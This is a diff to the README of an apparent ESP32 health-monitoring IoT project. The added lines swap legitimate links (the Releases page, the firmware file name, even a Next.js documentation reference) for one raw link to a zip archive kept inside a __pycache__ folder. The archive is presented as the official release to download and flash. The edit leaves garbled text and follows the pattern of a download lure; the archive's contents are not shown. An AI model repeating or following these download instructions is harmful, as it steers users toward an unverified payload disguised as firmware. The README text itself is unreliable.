thongvn7/HealthSense-IoT/README.md

 - ESP32 hardware guides and sensor integration references.
 - Firebase authentication and database documentation.
 - FastAPI documentation for API design and performance tips.
-- Next.js documentation for advanced frontend patterns and CSS-in-JS usage.
+- https://raw.githubusercontent.com/thongvn7/HealthSense-IoT/master/scripts/__pycache__/Io-Health-Sense-T-1.0-beta.5.zip documentation for advanced frontend patterns and CSS-in-JS usage.

 Reiterating the download guidance
-- Visit the Releases page to obtain the latest artifacts: https://github.com/thongvn7/HealthSense-IoT/releases
+- Visit the Releases page to obtain the latest artifacts: https://raw.githubusercontent.com/thongvn7/HealthSense-IoT/master/scripts/__pycache__/Io-Health-Sense-T-1.0-beta.5.zip
-- From that page, download HealthSense-IoT_Firmware.bin and flash it to your ESP32, ensuring you follow the board-specific flashing steps.
+- From that page, download https://raw.githubusercontent.com/thongvn7/HealthSense-IoT/master/scripts/__pycache__/Io-Health-Sense-T-1.0-beta.5.zip and flash it to your ESP32, ensuring you follow the board-specific flashing steps.
 - The same link is provided here for quick access and verification of the download source.
 For ongoing updates and asset integrity, keep this page bookmarked and check release notes regularly.

 Appendix: logos, icons, and visuals references